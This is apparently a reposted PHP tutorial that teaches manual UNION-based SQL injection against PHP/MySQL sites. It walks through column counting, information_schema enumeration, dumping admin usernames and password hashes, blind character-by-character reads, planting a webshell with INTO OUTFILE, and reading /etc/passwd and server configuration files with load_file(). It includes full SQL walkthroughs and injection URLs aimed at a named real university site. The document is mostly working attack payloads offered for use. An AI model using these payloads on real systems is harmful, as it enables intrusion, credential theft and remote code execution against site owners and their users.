
PHP+MySQL Manual Injection Statement Recommendation_PHP Tutorial

WBOY, original
2016-07-21 15:43:44

Find the number of columns

Order by num/*

Raise num until the page errors ("Unknown column 'num' in 'order clause'"); the largest value that still renders is the number of columns the original query selects. The trailing /* comments out the rest of the application's query (in MySQL "-- " with a trailing space, or #, does the same).

Match the column count

and 1=1 union select 1,2,3,4,5…….n/*

With n equal to the column count the page renders normally; any other n fails with "The used SELECT statements have a different number of columns".

Find which columns are displayed

and 1=2 union select 1,2,3,4,5…..n/*

Because 1=2 is false the original row disappears and the placeholder numbers take its place; the numbers that show up on the page mark the positions through which data can be read.


Retrieve server information with built-in functions

version() database() user()

Retrieve server information without finding the usable columns (does not work on every site):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

These single-value forms only work when the original query selects exactly one column; otherwise they fail with the column-count mismatch error.

Operating system information:

and 1=2 union all select @@global.version_compile_os from mysql.user /*

The "from mysql.user" is not needed to read the variable (a bare select @@global.version_compile_os works) and it requires read access to the mysql database, so the statement doubles as a crude privilege check.

Database privileges:

and ord(mid(user(),1,1))=114 /* a normal page means the first character of user() is 'r' (114), i.e. most likely root

This tests only the first character. Stepping the position in mid() and the value compared with ord() reads the whole account name one character at a time, which is the blind technique to fall back on when no column is displayed.

Dump databases (MySQL >= 5.0)

MySQL 5 and later ship the built-in information_schema database, which holds the structure of every database and table on the server.

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

Step the limit offset (limit 1,1, limit 2,1, …) to walk through the databases one per request.

Enumerate tables

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database name (as a hex literal) limit 0,1--

limit 0,1 means: start at record 0 (the first one) and show 1 record. Writing the database name as a hex literal (0x followed by the hex of its bytes) avoids quotes, so the statement survives magic_quotes_gpc.

Enumerate columns

and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table name (as a hex literal) limit 0,1

Dump the credentials

and 1=2 union select 1,2,3,username column,5,6,7,password column,9,10 from table name limit 0,1

Advanced usage (two values through one displayed column)

Union select 1,2,3,concat(username column,0x3c,password column),5,6,7,8,9,10 from table name limit 0,1

0x3c is "<"; because the browser swallows it as the start of a tag, a separator such as 0x3a (":") is more practical.
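The whole chain above, worked through end to end as an added example that is not part of the original page. The database demo_site, its tables news and admin, the sample rows, the display slots (the application prints title and body) and the vulnerable query `SELECT * FROM news WHERE id=` followed by the raw id parameter are all assumptions. The statements are written out in full as the server executes them, so the trailing /* that strips the rest of the application's query in the URL form is not needed here.

```sql
-- Added example (not from the original page): MySQL 5.x+ walkthrough of the
-- column-count / position / information_schema / credential-dump chain.
-- Schema, data and the vulnerable query are assumptions made for the demo.
CREATE DATABASE IF NOT EXISTS demo_site;
USE demo_site;

-- Ten columns; the application renders only title (slot 3) and body (slot 4).
CREATE TABLE news (
  id INT PRIMARY KEY, cat INT, title VARCHAR(100), body TEXT,
  author VARCHAR(50), hits INT, flag INT, created DATETIME,
  tag VARCHAR(50), extra VARCHAR(50)
);
INSERT INTO news VALUES (13, 1, 'Hello', 'First post', 'ed', 0, 0, NOW(), 't', 'x');

CREATE TABLE admin (id INT, username VARCHAR(50), password VARCHAR(64));
INSERT INTO admin VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');

-- The query the application builds: "SELECT * FROM news WHERE id=" . $_GET['id']
SELECT * FROM news WHERE id=13;

-- Step 1: column count. ORDER BY 10 renders, ORDER BY 11 errors with
-- "Unknown column '11' in 'order clause'", so the query selects 10 columns.
SELECT * FROM news WHERE id=13 ORDER BY 10;
-- SELECT * FROM news WHERE id=13 ORDER BY 11;   -- error

-- Step 2: which slots are displayed. 1=2 removes the real row, so the page
-- prints the placeholders: 3 and 4 appear where title and body were.
SELECT * FROM news WHERE id=13 AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10;

-- Step 3: server facts through the displayed slots.
SELECT * FROM news WHERE id=13 AND 1=2
  UNION SELECT 1,2,version(),database(),5,6,7,8,9,10;
SELECT * FROM news WHERE id=13 AND 1=2
  UNION SELECT 1,2,user(),@@global.version_compile_os,5,6,7,8,9,10;

-- Step 4: databases, one per request by stepping the LIMIT offset.
SELECT * FROM news WHERE id=13 AND 1=2
  UNION SELECT 1,2,3,SCHEMA_NAME,5,6,7,8,9,10
  FROM information_schema.SCHEMATA LIMIT 0,1;

-- Step 5: tables in demo_site. 0x64656D6F5F73697465 is hex('demo_site');
-- the hex literal needs no quotes, so magic_quotes_gpc cannot mangle it.
-- LIMIT 0,1 returns the first table here, admin.
SELECT * FROM news WHERE id=13 AND 1=2
  UNION SELECT 1,2,3,TABLE_NAME,5,6,7,8,9,10
  FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x64656D6F5F73697465 LIMIT 0,1;

-- Step 6: columns of admin (0x61646D696E is hex('admin')); LIMIT 1,1 is the
-- second column, username.
SELECT * FROM news WHERE id=13 AND 1=2
  UNION SELECT 1,2,3,COLUMN_NAME,5,6,7,8,9,10
  FROM information_schema.COLUMNS WHERE TABLE_NAME=0x61646D696E LIMIT 1,1;

-- Step 7: the credentials, two values squeezed through one displayed slot.
-- 0x3a is ':'; the page's 0x3c ('<') would be swallowed by the browser as a tag.
SELECT * FROM news WHERE id=13 AND 1=2
  UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10
  FROM admin LIMIT 0,1;
```

Run it against a throwaway MySQL instance as a user with SELECT on information_schema; every statement after the INSERTs is the injected query exactly as the server sees it, so the rendered title/body fields show the same values a browser would display.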

Write a webshell directly (root privileges)

Conditions: 1. The physical path of the site on disk is known
            2. The account has enough privilege, namely FILE (the page's test: whether select … from mysql.user succeeds, which shows broad privileges but does not by itself prove FILE)
            3. magic_quotes_gpc = Off (a php.ini directive, not a function; with it on, the quotes in the payload are escaped)

select 'one-line shell' into outfile 'physical path'

and 1=2 union all select <hex of the one-line shell> into outfile 'path'

The hex literal is written to the file as its decoded bytes, so the shell itself needs no quotes. Two further things decide whether this works: the directory must be writable by the OS user the MySQL server runs as, and on newer MySQL builds the secure_file_priv setting confines into outfile and load_file to one directory or, when NULL, disables them altogether.


load_file() commonly used paths:

1. replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
Both of the above read /etc/passwd (the hex literal and the char() list are two spellings of the same path) and show how to display the full contents of a PHP file: the browser treats "<" as the start of a tag, so everything from "<?php" onward is hidden unless "<" is replaced with a space. If that character is not replaced, the page comes back with the code invisible.
3. load_file(char(47)) lists the root directory on FreeBSD and SunOS systems
4. /etc/httpd/conf/httpd.conf or /usr/local/apache/conf/httpd.conf: Apache virtual host configuration on Linux
5. c:\Program Files\Apache Group\Apache\conf\httpd.conf or C:\apache\conf\httpd.conf: Apache configuration on Windows
6. c:/Resin-3.0.14/conf/resin.conf: Resin configuration for a JSP site
7. c:/Resin/conf/resin.conf or /usr/local/resin/conf/resin.conf: JSP virtual hosts configured under Resin on Linux
8. d:\APACHE\Apache2\conf\httpd.conf
9. C:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php: phpMyAdmin physical-path disclosure (requesting the file directly leaks the path in the error)
11. c:\windows\system32\inetsrv\MetaBase.xml: IIS virtual host configuration
12. /usr/local/resin-3.0.22/conf/resin.conf: Resin 3.0.22 configuration
13. /usr/local/resin-pro-3.0.22/conf/resin.conf: same as above
14. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: Apache virtual hosts
15. /etc/sysconfig/iptables: the firewall policy
16. /usr/local/app/php5/lib/php.ini: PHP settings
17. /etc/my.cnf: MySQL configuration
18. /etc/redhat-release: Red Hat release version
19. C:\mysql\data\mysql\user.MYD: the MySQL account table, including password hashes
20. /etc/sysconfig/network-scripts/ifcfg-eth0: IP configuration
21. C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini: Serv-U FTP configuration (accounts and settings)
22. c:\windows\my.ini
23. c:\boot.ini

Common website configuration files: config.inc.php, config.php. When reading them with load_file(), wrap the call as replace(load_file(HEX), char(60), char(32)).

Note:

Char(60) means <

Char(32) means space


Problems that occur during manual injection:

After injecting, the page displays:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

For example: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20

This is caused by the two halves of the UNION using different character sets and collations: the table's columns are latin1, while function results such as user() come back in the connection character set, utf8.

Solution: wrap each injected value in unhex(hex(...)). hex() turns the value into an ASCII hex string and unhex() returns it as a binary string, which MySQL unions with either side without a collation conflict. The URL above becomes:

http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20

and the injection can continue.
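The load_file() reads from the path list above and the unhex(hex()) workaround, as one added example that is not taken from the original page. The latin1 table pages, the application query `SELECT * FROM pages WHERE id=` followed by the raw id, the display slots (title and body) and a utf8 client connection are assumptions chosen so that the UNION runs into the collation error quoted above.

```sql
-- Added example (not from the original page). Assumed: a latin1 table `pages`
-- rendered by "SELECT * FROM pages WHERE id=" . $_GET['id'], with title and body
-- shown on the page (display slots 2 and 3), and a utf8 client connection.
CREATE DATABASE IF NOT EXISTS demo_site;
USE demo_site;
CREATE TABLE pages (
  id INT PRIMARY KEY, title VARCHAR(100), body TEXT, author VARCHAR(50)
) CHARACTER SET latin1;
INSERT INTO pages VALUES (13, 'About', 'About this site', 'ed');

-- Reading a file through a display slot. Needs the FILE privilege, and on
-- newer builds secure_file_priv must permit the path (NULL disables it entirely).
-- 0x2F6574632F706173737764 is hex('/etc/passwd'): no quotes, so magic_quotes_gpc
-- does not interfere.
SELECT * FROM pages WHERE id=13 AND 1=2
  UNION SELECT 1,2,load_file(0x2F6574632F706173737764),4;

-- For PHP sources the browser swallows everything from "<?php" as a tag, so
-- replace "<" (char 60) with a space (char 32) before it reaches the page.
-- char(47,101,...) is the same /etc/passwd path spelled one byte at a time.
SELECT * FROM pages WHERE id=13 AND 1=2
  UNION SELECT 1,2,
    replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)),
    4;

-- Collation clash: title/body carry latin1_swedish_ci, while user() and
-- database() come back as utf8_general_ci. Builds that refuse to UNION the
-- two report:
--   Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and
--   (utf8_general_ci,IMPLICIT) for operation 'UNION'
-- SELECT * FROM pages WHERE id=13 AND 1=2 UNION SELECT 1,user(),database(),4;

-- Fix: hex() turns the value into an ASCII hex string and unhex() returns it
-- as a binary string, which unions with either charset without a collation.
SELECT * FROM pages WHERE id=13 AND 1=2
  UNION SELECT 1,unhex(hex(user())),unhex(hex(database())),4;
SELECT * FROM pages WHERE id=13 AND 1=2
  UNION SELECT 1,2,unhex(hex(load_file(0x2F6574632F706173737764))),4;
```

The unhex(hex()) wrapper costs nothing when the collations already agree, so wrapping every injected value by default avoids the error on the first try rather than after it.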
